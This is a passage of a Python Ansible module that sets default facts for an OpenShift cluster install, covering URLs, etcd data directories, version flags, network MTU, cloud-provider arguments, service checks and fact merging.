        facts (dict): existing facts
    Returns:
        dict: the facts dict updated with the generated schedulable
              facts if they were not already present
    """
    if 'node' in facts and 'schedulable' not in facts['node']:
        facts['node']['schedulable'] = 'master' not in facts
    return facts
def set_selectors(facts):
    """ Set selectors facts if not already present in facts dict

    Defaults router and registry selectors to 'region=infra'; metrics,
    logging and etcd selectors default to None. A value of None or the
    string 'None' counts as unset.

    Args:
        facts (dict): existing facts
    Returns:
        dict: the facts dict updated with the generated selectors
              facts if they were not already present
    """
    infra_selector = "region=infra"
    hosted = facts.setdefault('hosted', {})
    hosted_defaults = (('router', infra_selector),
                       ('registry', infra_selector),
                       ('metrics', None),
                       ('etcd', None))
    for component, default_selector in hosted_defaults:
        component_facts = hosted.setdefault(component, {})
        if component_facts.get('selector') in [None, 'None']:
            component_facts['selector'] = default_selector

    # Logging lives at the top level of facts, not under 'hosted'.
    logging_facts = facts.setdefault('logging', {})
    if logging_facts.get('selector') in [None, 'None']:
        logging_facts['selector'] = None
    return facts
def set_dnsmasq_facts_if_unset(facts):
    """ Set dnsmasq facts if not already present in facts

    Defaults the master's DNS port to 8053 when both 'common' and 'master'
    fact groups exist and no dns_port has been set.

    Args:
        facts (dict): existing facts
    Returns:
        facts (dict): updated facts with values set if not previously set
    """
    if 'common' in facts and 'master' in facts:
        facts['master'].setdefault('dns_port', 8053)
    return facts
def set_project_cfg_facts_if_unset(facts):
    """ Set Project Configuration facts if not already present in facts dict

    Args:
        facts (dict): existing facts
    Returns:
        dict: the facts dict updated with the generated Project Configuration
              facts if they were not already present
    """
    defaults = {
        'default_node_selector': '',
        'project_request_message': '',
        'project_request_template': '',
        'mcs_allocator_range': 's0:/2',
        'mcs_labels_per_project': 5,
        'uid_allocator_range': '1000000000-1999999999/10000'
    }
    if 'master' in facts:
        for fact, default_value in defaults.items():
            facts['master'].setdefault(fact, default_value)
    return facts
def set_identity_providers_if_unset(facts):
    """ Set identity_providers fact if not already present in facts dict

    Enterprise deployments default to DenyAll; every other deployment
    type defaults to AllowAll.

    Args:
        facts (dict): existing facts
    Returns:
        dict: the facts dict updated with the generated identity providers
              facts if they were not already present
    """
    if 'master' in facts:
        deployment_type = facts['common']['deployment_type']
        if 'identity_providers' not in facts['master']:
            if deployment_type == 'openshift-enterprise':
                provider = dict(name='deny_all', challenge=True, login=True,
                                kind='DenyAllPasswordIdentityProvider')
            else:
                provider = dict(name='allow_all', challenge=True, login=True,
                                kind='AllowAllPasswordIdentityProvider')
            facts['master']['identity_providers'] = [provider]
    return facts
def set_url_facts_if_unset(facts):
    """ Set url facts if not already present in facts dict

    Derives the API, console, loopback and etcd URLs for the master from
    the configured hostnames, ports and SSL flags. Every URL is only set
    via setdefault, so explicitly provided values win.

    Args:
        facts (dict): existing facts
    Returns:
        dict: the facts dict updated with the generated url facts if they
              were not already present
    """
    if 'master' in facts:
        hostname = facts['common']['hostname']
        cluster_hostname = facts['master'].get('cluster_hostname')
        cluster_public_hostname = facts['master'].get('cluster_public_hostname')
        public_hostname = facts['common']['public_hostname']
        # Prefer the load-balanced cluster hostnames when configured.
        api_hostname = cluster_hostname if cluster_hostname else hostname
        api_public_hostname = cluster_public_hostname if cluster_public_hostname else public_hostname
        console_path = facts['master']['console_path']
        etcd_hosts = facts['master']['etcd_hosts']
        # Scheme selection per URL flavor; loopback follows the API setting.
        use_ssl = dict(
            api=facts['master']['api_use_ssl'],
            public_api=facts['master']['api_use_ssl'],
            loopback_api=facts['master']['api_use_ssl'],
            console=facts['master']['console_use_ssl'],
            public_console=facts['master']['console_use_ssl'],
            etcd=facts['master']['etcd_use_ssl']
        )
        ports = dict(
            api=facts['master']['api_port'],
            public_api=facts['master']['api_port'],
            loopback_api=facts['master']['api_port'],
            console=facts['master']['console_port'],
            public_console=facts['master']['console_port'],
            etcd=facts['master']['etcd_port'],
        )
        etcd_urls = []
        if etcd_hosts != '':
            # External etcd hosts configured: one URL per host, embedded
            # etcd disabled.
            facts['master']['etcd_port'] = ports['etcd']
            facts['master']['embedded_etcd'] = False
            for host in etcd_hosts:
                etcd_urls.append(format_url(use_ssl['etcd'], host,
                                            ports['etcd']))
        else:
            # No external etcd: point at the master host itself.
            etcd_urls = [format_url(use_ssl['etcd'], hostname,
                                    ports['etcd'])]
        facts['master'].setdefault('etcd_urls', etcd_urls)
        prefix_hosts = [('api', api_hostname),
                        ('public_api', api_public_hostname),
                        ('loopback_api', hostname)]
        for prefix, host in prefix_hosts:
            facts['master'].setdefault(prefix + '_url', format_url(use_ssl[prefix],
                                                                   host,
                                                                   ports[prefix]))
        # kubeconfig-style names may not contain dots; replace with dashes.
        r_lhn = "{0}:{1}".format(hostname, ports['api']).replace('.', '-')
        r_lhu = "system:openshift-master/{0}:{1}".format(api_hostname, ports['api']).replace('.', '-')
        facts['master'].setdefault('loopback_cluster_name', r_lhn)
        facts['master'].setdefault('loopback_context_name', "default/{0}/system:openshift-master".format(r_lhn))
        facts['master'].setdefault('loopback_user', r_lhu)
        # Console URLs additionally carry the console path suffix.
        prefix_hosts = [('console', api_hostname), ('public_console', api_public_hostname)]
        for prefix, host in prefix_hosts:
            facts['master'].setdefault(prefix + '_url', format_url(use_ssl[prefix],
                                                                   host,
                                                                   ports[prefix],
                                                                   console_path))
    return facts
def set_aggregate_facts(facts):
    """ Set aggregate facts

    Collects every hostname and IP the host is known by into
    common.all_hostnames, and the cluster-internal subset into
    common.internal_hostnames. Also records the first service IP of the
    portal network as common.kube_svc_ip.

    Args:
        facts (dict): existing facts
    Returns:
        dict: the facts dict updated with aggregated facts
    """
    all_hostnames = set()
    internal_hostnames = set()
    kube_svc_ip = first_ip(facts['common']['portal_net'])
    if 'common' in facts:
        common = facts['common']
        common['kube_svc_ip'] = kube_svc_ip
        all_hostnames.update([common['hostname'], common['public_hostname'],
                              common['ip'], common['public_ip']])
        internal_hostnames.update([common['hostname'], common['ip']])

        cluster_domain = common['dns_domain']

        if 'master' in facts:
            for cluster_key in ('cluster_hostname', 'cluster_public_hostname'):
                if cluster_key in facts['master']:
                    all_hostnames.add(facts['master'][cluster_key])
            # Well-known in-cluster service names for the API.
            svc_names = ['openshift', 'openshift.default', 'openshift.default.svc',
                         'openshift.default.svc.' + cluster_domain, 'kubernetes', 'kubernetes.default',
                         'kubernetes.default.svc', 'kubernetes.default.svc.' + cluster_domain]
            all_hostnames.update(svc_names)
            internal_hostnames.update(svc_names)
            all_hostnames.add(kube_svc_ip)
            internal_hostnames.add(kube_svc_ip)

    facts['common']['all_hostnames'] = list(all_hostnames)
    facts['common']['internal_hostnames'] = list(internal_hostnames)

    return facts
def set_etcd_facts_if_unset(facts):
    """ Set etcd facts if not already present.

        If using embedded etcd, loads the data directory from master-config.yaml.
        If using standalone etcd, loads ETCD_DATA_DIR from etcd.conf.
        If anything goes wrong parsing these, the fact will not be set.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict, possibly updated with etcd facts
    """
    if 'master' in facts and safe_get_bool(facts['master']['embedded_etcd']):
        etcd_facts = facts['etcd'] if 'etcd' in facts else dict()

        if 'etcd_data_dir' not in etcd_facts:
            try:
                # Parse master config to find actual etcd data dir:
                master_cfg_path = os.path.join(facts['common']['config_base'],
                                               'master/master-config.yaml')
                # Context manager so the handle is closed even when yaml
                # parsing raises (the original open()/close() leaked it then).
                with open(master_cfg_path, 'r') as master_cfg_f:
                    config = yaml.safe_load(master_cfg_f.read())

                etcd_facts['etcd_data_dir'] = \
                    config['etcdConfig']['storageDirectory']

                facts['etcd'] = etcd_facts

            # We don't want exceptions bubbling up here:
            # pylint: disable=broad-except
            except Exception:
                pass
    else:
        etcd_facts = facts['etcd'] if 'etcd' in facts else dict()

        # Read ETCD_DATA_DIR from /etc/etcd/etcd.conf:
        try:
            # Add a fake section header so configparser accepts the
            # sysconfig-style file:
            with open('/etc/etcd/etcd.conf', 'r') as etcd_conf_f:
                ini_str = text_type('[root]\n' + etcd_conf_f.read(), 'utf-8')
            ini_fp = io.StringIO(ini_str)
            config = configparser.RawConfigParser()
            # read_file replaces readfp, which was removed in Python 3.12.
            config.read_file(ini_fp)
            etcd_data_dir = config.get('root', 'ETCD_DATA_DIR')
            # Values in etcd.conf are commonly quoted; strip matching quotes.
            if etcd_data_dir.startswith('"') and etcd_data_dir.endswith('"'):
                etcd_data_dir = etcd_data_dir[1:-1]

            etcd_facts['etcd_data_dir'] = etcd_data_dir
            facts['etcd'] = etcd_facts

        # We don't want exceptions bubbling up here:
        # pylint: disable=broad-except
        except Exception:
            pass
    return facts
def set_deployment_facts_if_unset(facts):
    """ Set facts that vary based on deployment_type.

        Currently covers common.service_type, master.registry_url,
        node.registry_url, node.storage_plugin_deps, enterprise additional
        docker registries and the registry-subtype disabled features.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict updated with the generated deployment_type
                  facts
    """
    # disabled to avoid breaking up facts related to deployment type into
    # multiple methods for now.
    # pylint: disable=too-many-statements, too-many-branches
    if 'common' in facts:
        if 'service_type' not in facts['common']:
            is_origin = facts['common']['deployment_type'] == 'origin'
            facts['common']['service_type'] = 'origin' if is_origin else 'atomic-openshift'

    if 'docker' in facts:
        if facts['common']['deployment_type'] == 'openshift-enterprise':
            # Enterprise deployments always search the Red Hat registry.
            registries = facts['docker'].get('additional_registries', [])
            ent_reg = 'registry.access.redhat.com'
            if ent_reg not in registries:
                facts['docker']['additional_registries'] = registries + [ent_reg]

    for role in ('master', 'node'):
        if role not in facts:
            continue
        if 'registry_url' not in facts[role]:
            if facts['common']['deployment_type'] == 'openshift-enterprise':
                facts[role]['registry_url'] = 'openshift3/ose-${component}:${version}'
            else:
                facts[role]['registry_url'] = 'openshift/origin-${component}:${version}'

    if 'master' in facts:
        if 'disabled_features' not in facts['master']:
            # Registry-only deployments disable the build/console features.
            if facts['common']['deployment_subtype'] == 'registry':
                facts['master']['disabled_features'] = ['Builder', 'S2IBuilder', 'WebConsole']

    if 'node' in facts:
        facts['node'].setdefault('storage_plugin_deps', ['ceph', 'glusterfs', 'iscsi'])

    return facts
# pylint: disable=too-many-statements
def set_version_facts_if_unset(facts):
    """ Set version facts. This currently includes common.version,
        common.short_version, the common.version_gte_* comparison flags
        and common.examples_content_version.

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict updated with version facts.
    """
    if 'common' in facts:
        deployment_type = facts['common']['deployment_type']
        openshift_version = get_openshift_version(facts)
        if openshift_version and openshift_version != "latest":
            version = LooseVersion(openshift_version)
            facts['common']['version'] = openshift_version
            # short_version is the first two numeric components, e.g. "3.6"
            facts['common']['short_version'] = '.'.join([str(x) for x in version.version[0:2]])
            if deployment_type == 'origin':
                # origin used 1.x release numbering through 1.5, then
                # adopted the enterprise 3.x numbering starting with 3.6,
                # hence the paired thresholds below.
                version_gte_3_1_or_1_1 = version >= LooseVersion('1.1.0')
                version_gte_3_1_1_or_1_1_1 = version >= LooseVersion('1.1.1')
                version_gte_3_2_or_1_2 = version >= LooseVersion('1.2.0')
                version_gte_3_3_or_1_3 = version >= LooseVersion('1.3.0')
                version_gte_3_4_or_1_4 = version >= LooseVersion('1.4')
                version_gte_3_5_or_1_5 = version >= LooseVersion('1.5')
                version_gte_3_6 = version >= LooseVersion('3.6')
                version_gte_3_7 = version >= LooseVersion('3.7')
            else:
                # enterprise releases, including 3.0.x pre-release builds
                version_gte_3_1_or_1_1 = version >= LooseVersion('3.0.2.905')
                version_gte_3_1_1_or_1_1_1 = version >= LooseVersion('3.1.1')
                version_gte_3_2_or_1_2 = version >= LooseVersion('3.1.1.901')
                version_gte_3_3_or_1_3 = version >= LooseVersion('3.3.0')
                version_gte_3_4_or_1_4 = version >= LooseVersion('3.4')
                version_gte_3_5_or_1_5 = version >= LooseVersion('3.5')
                version_gte_3_6 = version >= LooseVersion('3.6')
                version_gte_3_7 = version >= LooseVersion('3.7')
        else:
            # 'Latest' version is set to True, 'Next' versions set to False
            version_gte_3_1_or_1_1 = True
            version_gte_3_1_1_or_1_1_1 = True
            version_gte_3_2_or_1_2 = True
            version_gte_3_3_or_1_3 = True
            version_gte_3_4_or_1_4 = True
            version_gte_3_5_or_1_5 = True
            version_gte_3_6 = True
            version_gte_3_7 = False
        facts['common']['version_gte_3_1_or_1_1'] = version_gte_3_1_or_1_1
        facts['common']['version_gte_3_1_1_or_1_1_1'] = version_gte_3_1_1_or_1_1_1
        facts['common']['version_gte_3_2_or_1_2'] = version_gte_3_2_or_1_2
        facts['common']['version_gte_3_3_or_1_3'] = version_gte_3_3_or_1_3
        facts['common']['version_gte_3_4_or_1_4'] = version_gte_3_4_or_1_4
        facts['common']['version_gte_3_5_or_1_5'] = version_gte_3_5_or_1_5
        facts['common']['version_gte_3_6'] = version_gte_3_6
        facts['common']['version_gte_3_7'] = version_gte_3_7

        # Pick the newest examples content version the detected release
        # supports (checked newest-first).
        if version_gte_3_7:
            examples_content_version = 'v3.7'
        elif version_gte_3_6:
            examples_content_version = 'v3.6'
        elif version_gte_3_5_or_1_5:
            examples_content_version = 'v1.5'
        elif version_gte_3_4_or_1_4:
            examples_content_version = 'v1.4'
        elif version_gte_3_3_or_1_3:
            examples_content_version = 'v1.3'
        elif version_gte_3_2_or_1_2:
            examples_content_version = 'v1.2'
        elif version_gte_3_1_or_1_1:
            examples_content_version = 'v1.1'
        else:
            examples_content_version = 'v1.0'

        facts['common']['examples_content_version'] = examples_content_version

    return facts
def set_sdn_facts_if_unset(facts, system_facts):
    """ Set sdn facts if not already present in facts dict

        Args:
            facts (dict): existing facts
            system_facts (dict): ansible_facts
        Returns:
            dict: the facts dict updated with the generated sdn facts if they
                  were not already present
    """
    if 'master' in facts:
        # set defaults for sdn_cluster_network_cidr and sdn_host_subnet_length
        # these might be overridden if they exist in the master config file
        sdn_cluster_network_cidr = '10.128.0.0/14'
        sdn_host_subnet_length = '9'

        master_cfg_path = os.path.join(facts['common']['config_base'],
                                       'master/master-config.yaml')
        if os.path.isfile(master_cfg_path):
            with open(master_cfg_path, 'r') as master_cfg_f:
                config = yaml.safe_load(master_cfg_f.read())

            # An existing master config wins over the defaults above.
            if 'networkConfig' in config:
                if 'clusterNetworkCIDR' in config['networkConfig']:
                    sdn_cluster_network_cidr = \
                        config['networkConfig']['clusterNetworkCIDR']
                if 'hostSubnetLength' in config['networkConfig']:
                    sdn_host_subnet_length = \
                        config['networkConfig']['hostSubnetLength']

        if 'sdn_cluster_network_cidr' not in facts['master']:
            facts['master']['sdn_cluster_network_cidr'] = sdn_cluster_network_cidr
        if 'sdn_host_subnet_length' not in facts['master']:
            facts['master']['sdn_host_subnet_length'] = sdn_host_subnet_length

    if 'node' in facts and 'sdn_mtu' not in facts['node']:
        node_ip = facts['common']['ip']

        # default MTU if interface MTU cannot be detected
        facts['node']['sdn_mtu'] = '1450'

        # Scan the ansible system facts for the interface whose ipv4 address
        # matches this node's IP and derive the SDN MTU from it.
        for val in itervalues(system_facts):
            if isinstance(val, dict) and 'mtu' in val:
                mtu = val['mtu']

                if 'ipv4' in val and val['ipv4'].get('address') == node_ip:
                    # Reserve 50 bytes below the interface MTU; presumably
                    # headroom for SDN encapsulation overhead — TODO confirm.
                    facts['node']['sdn_mtu'] = str(mtu - 50)
    return facts
def set_nodename(facts):
    """ Set node.nodename from cloud metadata when on GCE, otherwise from
        the lowercased common hostname.
    """
    if 'node' in facts and 'common' in facts:
        on_gce = 'cloudprovider' in facts and facts['cloudprovider']['kind'] == 'gce'
        if on_gce:
            # GCE nodes register under the short (unqualified) instance name.
            instance_hostname = facts['provider']['metadata']['instance']['hostname']
            facts['node']['nodename'] = instance_hostname.split('.')[0]
        else:
            # TODO: The openstack cloudprovider nodename setting was too
            # opinionated. It needs to be generalized before it can be
            # enabled again.
            facts['node']['nodename'] = facts['common']['hostname'].lower()
    return facts
def migrate_oauth_template_facts(facts):
    """
    Migrate an old oauth template fact to a newer format if it's present.

    The legacy 'oauth_template' fact was just a filename, and assumed you were
    setting the 'login' template.

    The new pluralized 'oauth_templates' fact is a dict mapping the template
    name to a filename.

    Simplify the code after this by merging the old fact into the new.
    """
    master = facts.get('master', {})
    if 'oauth_template' in master:
        legacy_template = master['oauth_template']
        if 'oauth_templates' not in master:
            master['oauth_templates'] = {"login": legacy_template}
        else:
            # Only fill in 'login' when the new fact doesn't already set it.
            master['oauth_templates'].setdefault('login', legacy_template)
    return facts
def format_url(use_ssl, hostname, port, path=''):
    """ Format url based on ssl flag, hostname, port and path

        Args:
            use_ssl (bool): is ssl enabled
            hostname (str): hostname
            port (str): port
            path (str): url path

        Returns:
            str: The generated url string
    """
    scheme = 'https' if use_ssl else 'http'
    # Omit the port from the netloc when it is the scheme's default.
    default_port = '443' if use_ssl else '80'
    netloc = hostname if port == default_port else "%s:%s" % (hostname, port)
    try:
        return urlparse.urlunparse((scheme, netloc, path, '', '', ''))
    except AttributeError:
        # pylint: disable=undefined-variable
        return urlunparse((scheme, netloc, path, '', '', ''))
def get_current_config(facts):
    """ Get current openshift config

        Args:
            facts (dict): existing facts
        Returns:
            dict: the facts dict updated with the current openshift config
    """
    current_config = dict()
    # Every fact section except 'common' and 'provider' is a host role.
    roles = [role for role in facts if role not in ['common', 'provider']]
    for role in roles:
        if 'roles' in current_config:
            current_config['roles'].append(role)
        else:
            current_config['roles'] = [role]

        # TODO: parse the /etc/sysconfig/openshift-{master,node} config to
        # determine the location of files.
        # TODO: I suspect this isn't working right now, but it doesn't prevent
        # anything from working properly as far as I can tell, perhaps because
        # we override the kubeconfig path everywhere we use it?
        # Query kubeconfig settings
        kubeconfig_dir = '/var/lib/origin/openshift.local.certificates'
        if role == 'node':
            kubeconfig_dir = os.path.join(
                kubeconfig_dir, "node-%s" % facts['common']['hostname']
            )

        kubeconfig_path = os.path.join(kubeconfig_dir, '.kubeconfig')
        if os.path.isfile('/usr/bin/openshift') and os.path.isfile(kubeconfig_path):
            try:
                _, output, _ = module.run_command(  # noqa: F405
                    ["/usr/bin/openshift", "ex", "config", "view", "-o",
                     "json", "--kubeconfig=%s" % kubeconfig_path],
                    check_rc=False
                )
                config = json.loads(output)

                # Mask certificate/key material so it never lands in the
                # recorded facts.
                cad = 'certificate-authority-data'
                try:
                    for cluster in config['clusters']:
                        config['clusters'][cluster][cad] = 'masked'
                except KeyError:
                    pass
                try:
                    for user in config['users']:
                        config['users'][user][cad] = 'masked'
                        config['users'][user]['client-key-data'] = 'masked'
                except KeyError:
                    pass

                current_config['kubeconfig'] = config

            # override pylint broad-except warning, since we do not want
            # to bubble up any exceptions if oc config view
            # fails
            # pylint: disable=broad-except
            except Exception:
                pass

    return current_config
def build_kubelet_args(facts):
    """Build node kubelet_args

    In the node-config.yaml file, kubeletArgument sub-keys have their
    values provided as a list. Hence the gratuitous use of ['foo'] below.

    Args:
        facts (dict): existing facts
    Returns:
        dict: facts, with node.kubelet_args merged in when anything was added
    """
    cloud_cfg_path = os.path.join(
        facts['common']['config_base'],
        'cloudprovider')

    # We only have to do this stuff on hosts that are nodes
    if 'node' in facts:
        # Any changes to the kubeletArguments parameter are stored
        # here first.
        kubelet_args = {}

        if 'cloudprovider' in facts:
            # EVERY cloud is special <3
            if 'kind' in facts['cloudprovider']:
                if facts['cloudprovider']['kind'] == 'aws':
                    kubelet_args['cloud-provider'] = ['aws']
                    kubelet_args['cloud-config'] = [cloud_cfg_path + '/aws.conf']
                if facts['cloudprovider']['kind'] == 'openstack':
                    kubelet_args['cloud-provider'] = ['openstack']
                    kubelet_args['cloud-config'] = [cloud_cfg_path + '/openstack.conf']
                if facts['cloudprovider']['kind'] == 'gce':
                    kubelet_args['cloud-provider'] = ['gce']
                    kubelet_args['cloud-config'] = [cloud_cfg_path + '/gce.conf']

        # Automatically add node-labels to the kubeletArguments
        # parameter. See BZ1359848 for additional details.
        #
        # Ref: https://bugzilla.redhat.com/show_bug.cgi?id=1359848
        if 'labels' in facts['node'] and isinstance(facts['node']['labels'], dict):
            # tl;dr: os_node_labels="{'foo': 'bar', 'a': 'b'}" turns
            # into ['foo=bar', 'a=b']
            # pylint: disable=unnecessary-lambda
            labels_str = list(map(lambda x: '='.join(x), facts['node']['labels'].items()))
            # Bug fix: labels_str is a list, so the previous check
            # `labels_str != ''` was always true and an empty labels dict
            # still produced an (empty) node-labels argument.  Test
            # truthiness instead so empty label dicts are skipped.
            if labels_str:
                kubelet_args['node-labels'] = labels_str

        # If we've added items to the kubelet_args dict then we need
        # to merge the new items back into the main facts object.
        if kubelet_args != {}:
            facts = merge_facts({'node': {'kubelet_args': kubelet_args}}, facts, [], [])

    return facts
def build_controller_args(facts):
    """ Build master controller_args for the configured cloud provider. """
    cloud_cfg_path = os.path.join(facts['common']['config_base'],
                                  'cloudprovider')
    if 'master' in facts:
        controller_args = {}
        if 'cloudprovider' in facts:
            if 'kind' in facts['cloudprovider']:
                kind = facts['cloudprovider']['kind']
                # Each supported provider gets a matching cloud-config file
                # under the cloudprovider config directory.
                for provider in ('aws', 'openstack', 'gce'):
                    if kind == provider:
                        controller_args['cloud-provider'] = [provider]
                        controller_args['cloud-config'] = [cloud_cfg_path + '/' + provider + '.conf']
        if controller_args:
            facts = merge_facts({'master': {'controller_args': controller_args}}, facts, [], [])
    return facts
def build_api_server_args(facts):
    """ Build master api_server_args for the configured cloud provider. """
    cloud_cfg_path = os.path.join(facts['common']['config_base'],
                                  'cloudprovider')
    if 'master' in facts:
        api_server_args = {}
        if 'cloudprovider' in facts:
            if 'kind' in facts['cloudprovider']:
                kind = facts['cloudprovider']['kind']
                # Mirror build_controller_args: provider name plus the
                # matching cloud-config file.
                for provider in ('aws', 'openstack', 'gce'):
                    if kind == provider:
                        api_server_args['cloud-provider'] = [provider]
                        api_server_args['cloud-config'] = [cloud_cfg_path + '/' + provider + '.conf']
        if api_server_args:
            facts = merge_facts({'master': {'api_server_args': api_server_args}}, facts, [], [])
    return facts
def is_service_running(service):
    """ Queries systemd through dbus to see if the service is running.

        Args:
            service (str): unit name, with or without the '.service' suffix
        Returns:
            bool: True when the unit is both loaded and active; False
                otherwise, including when the dbus query fails
    """
    service_running = False
    try:
        bus = SystemBus()
        systemd = bus.get_object('org.freedesktop.systemd1', '/org/freedesktop/systemd1')
        manager = Interface(systemd, dbus_interface='org.freedesktop.systemd1.Manager')
        # Resolve the unit object path; names already ending in '.service'
        # are passed through unchanged.
        service_unit = service if service.endswith('.service') else manager.GetUnit('{0}.service'.format(service))
        service_proxy = bus.get_object('org.freedesktop.systemd1', str(service_unit))
        service_properties = Interface(service_proxy, dbus_interface='org.freedesktop.DBus.Properties')
        service_load_state = service_properties.Get('org.freedesktop.systemd1.Unit', 'LoadState')
        service_active_state = service_properties.Get('org.freedesktop.systemd1.Unit', 'ActiveState')
        if service_load_state == 'loaded' and service_active_state == 'active':
            service_running = True
    except DBusException:
        # TODO: do not swallow exception, as it may be hiding useful debugging
        # information.
        pass

    return service_running
def rpm_rebuilddb():
    """
    Runs rpm --rebuilddb to ensure the db is in good shape.

    Best-effort: the command's return code and output are intentionally
    ignored.  `module` is the Ansible module object defined at file scope.
    """
    module.run_command(['/usr/bin/rpm', '--rebuilddb'])  # noqa: F405
def get_version_output(binary, version_cmd):
    """ Runs and returns the version output for a command.

        Args:
            binary (str or list): path to the executable (or argv prefix)
            version_cmd (str or list): version subcommand / flag(s)
        Returns:
            str or None: stdout of the command, or None when the binary is
                not present on this host
    """
    cmd = []
    # Both arguments may be a plain string or a list of argv items.
    for item in (binary, version_cmd):
        if isinstance(item, list):
            cmd.extend(item)
        else:
            cmd.append(item)

    # Bug fix: initialize output so a missing binary returns None instead of
    # risking an unbound local on the return below.
    output = None
    if os.path.isfile(cmd[0]):
        _, output, _ = module.run_command(cmd)  # noqa: F405
    return output
def get_docker_version_info():
    """ Parses and returns the docker version info.

        Returns:
            dict or None: {'api_version': ..., 'version': ...} taken from the
                'Server' section of `docker version` output, or None when
                neither the docker nor container-engine service is running.
    """
    result = None
    if is_service_running('docker') or is_service_running('container-engine'):
        # `docker version` prints "Key: value" lines, which yaml.safe_load
        # parses into a nested dict.
        version_info = yaml.safe_load(get_version_output('/usr/bin/docker', 'version'))
        if 'Server' in version_info:
            result = {
                'api_version': version_info['Server']['API version'],
                'version': version_info['Server']['Version']
            }
    return result
def get_hosted_registry_insecure():
    """ Parses OPTIONS from /etc/sysconfig/docker to determine if the
        registry is currently insecure.

        Returns:
            bool or None: True when 'insecure-registry' appears in OPTIONS;
                None when the file is absent, unparseable, or the flag is
                not present.
    """
    hosted_registry_insecure = None
    if os.path.exists('/etc/sysconfig/docker'):
        try:
            # Prepend a fake section header so configparser accepts the
            # sysconfig file; the context manager closes the handle that the
            # original bare open() leaked.
            with open('/etc/sysconfig/docker', 'r') as docker_cfg:
                ini_str = text_type('[root]\n' + docker_cfg.read(), 'utf-8')
            ini_fp = io.StringIO(ini_str)
            config = configparser.RawConfigParser()
            # read_file replaces readfp, which was removed in Python 3.12.
            config.read_file(ini_fp)
            options = config.get('root', 'OPTIONS')
            if 'insecure-registry' in options:
                hosted_registry_insecure = True
        except Exception:  # pylint: disable=broad-except
            pass
    return hosted_registry_insecure
def get_openshift_version(facts):
    """ Get current version of openshift on the host.

        Checks a variety of ways ranging from fastest to slowest.

        Args:
            facts (dict): existing facts
        Returns:
            str or None: the current openshift version (commit offset
                stripped), or None when no method could determine it
    """
    version = None

    # No need to run this method repeatedly on a system if we already know the
    # version
    # TODO: We need a way to force reload this after upgrading bits.
    if 'common' in facts:
        if 'version' in facts['common'] and facts['common']['version'] is not None:
            return chomp_commit_offset(facts['common']['version'])

    if os.path.isfile('/usr/bin/openshift'):
        _, output, _ = module.run_command(['/usr/bin/openshift', 'version'])  # noqa: F405
        version = parse_openshift_version(output)
    elif 'common' in facts and 'is_containerized' in facts['common']:
        # Containerized installs have no local binary; read the version from
        # the systemd environment files instead.
        version = get_container_openshift_version(facts)

    # Handle containerized masters that have not yet been configured as a node.
    # This can be very slow and may get re-run multiple times, so we only use this
    # if other methods failed to find a version.
    if not version and os.path.isfile('/usr/local/bin/openshift'):
        _, output, _ = module.run_command(['/usr/local/bin/openshift', 'version'])  # noqa: F405
        version = parse_openshift_version(output)

    return chomp_commit_offset(version)
def chomp_commit_offset(version):
    """Chomp any "+git.foo" commit offset string from the given `version`
    and return the modified version string.

    Ex:
    - chomp_commit_offset(None) => None
    - chomp_commit_offset(1337) => "1337"
    - chomp_commit_offset("v3.4.0.15+git.derp") => "v3.4.0.15"
    - chomp_commit_offset("v3.4.0.15") => "v3.4.0.15"
    - chomp_commit_offset("v1.3.0+52492b4") => "v1.3.0"
    """
    if version is None:
        return None
    # Stringify (the value may be numeric) and keep everything before the
    # first '+'; partition() returns the whole string when no '+' exists.
    return str(version).partition('+')[0]
def get_container_openshift_version(facts):
    """
    If containerized, see if we can determine the installed version via the
    systemd environment files.

    Returns the bare version number (no leading 'v', no '-release' suffix),
    or None when no environment file yields one.
    """
    prefix = "IMAGE_VERSION="
    for template in ('/etc/sysconfig/%s-master', '/etc/sysconfig/%s-node'):
        env_path = template % facts['common']['service_type']
        if not os.path.exists(env_path):
            continue

        with open(env_path) as env_file:
            for line in env_file:
                if not line.startswith(prefix):
                    continue
                tag = line[len(prefix):].strip()
                # Drop the leading "v" and any trailing release info; only
                # the plain version number is wanted here.
                stripped = tag[1:] if tag[0] == 'v' else tag
                return stripped.split("-")[0]
    return None
def parse_openshift_version(output):
    """ Extract the openshift version number from 'openshift version' output.

        Args:
            output (str): output of 'openshift version'
        Returns:
            str: the version number ('' when no openshift line is present)
    """
    versions = {}
    for line in output.splitlines():
        if ' v' in line:
            component, number = line.split(' v')
            versions[component] = number
    # Remove trailing build number and commit hash from older versions, we
    # need to return a straight w.x.y.z version here for use as
    # openshift_version throughout the playbooks/roles.
    # (i.e. 3.1.1.6-64-g80b61da)
    return versions.get('openshift', '').split('-')[0]
def apply_provider_facts(facts, provider_facts):
    """ Apply provider facts to supplied facts dict

        Args:
            facts (dict): facts dict to update
            provider_facts (dict): provider facts to apply
        Returns:
            dict: the merged facts
    """
    if not provider_facts:
        return facts

    # Provider-supplied IPs are taken as-is; hostnames go through
    # choose_hostname() so an unusable provider hostname falls back to the
    # existing fact.
    for hostname_var, ip_var in (('hostname', 'ip'), ('public_hostname', 'public_ip')):
        provider_ip = provider_facts['network'].get(ip_var)
        if provider_ip:
            facts['common'][ip_var] = provider_ip

        facts['common'][hostname_var] = choose_hostname(
            [provider_facts['network'].get(hostname_var)],
            facts['common'][hostname_var]
        )

    facts['provider'] = provider_facts
    return facts
# Disabling pylint too many branches. This function needs refactored
# but is a very core part of openshift_facts.
# pylint: disable=too-many-branches, too-many-nested-blocks
def merge_facts(orig, new, additive_facts_to_overwrite, protected_facts_to_overwrite):
    """ Recursively merge facts dicts

        Args:
            orig (dict): existing facts
            new (dict): facts to update
            additive_facts_to_overwrite (list): additive facts to overwrite in jinja
                                                '.' notation ex: ['master.named_certificates']
            protected_facts_to_overwrite (list): protected facts to overwrite in jinja
                                                 '.' notation ex: ['master.master_count']
        Returns:
            dict: the merged facts
    """
    additive_facts = ['named_certificates']
    protected_facts = ['ha']

    # Facts we do not ever want to merge. These originate in inventory variables
    # and contain JSON dicts. We don't ever want to trigger a merge
    # here, just completely overwrite with the new if they are present there.
    inventory_json_facts = ['admission_plugin_config',
                            'kube_admission_plugin_config',
                            'image_policy_config',
                            "builddefaults",
                            "buildoverrides"]

    # The result is built fresh; orig and new are never mutated (values are
    # deep-copied on the way in).
    facts = dict()
    for key, value in iteritems(orig):
        # Key exists in both old and new facts.
        if key in new:
            if key in inventory_json_facts:
                # Watchout for JSON facts that sometimes load as strings.
                # (can happen if the JSON contains a boolean)
                if isinstance(new[key], string_types):
                    facts[key] = yaml.safe_load(new[key])
                else:
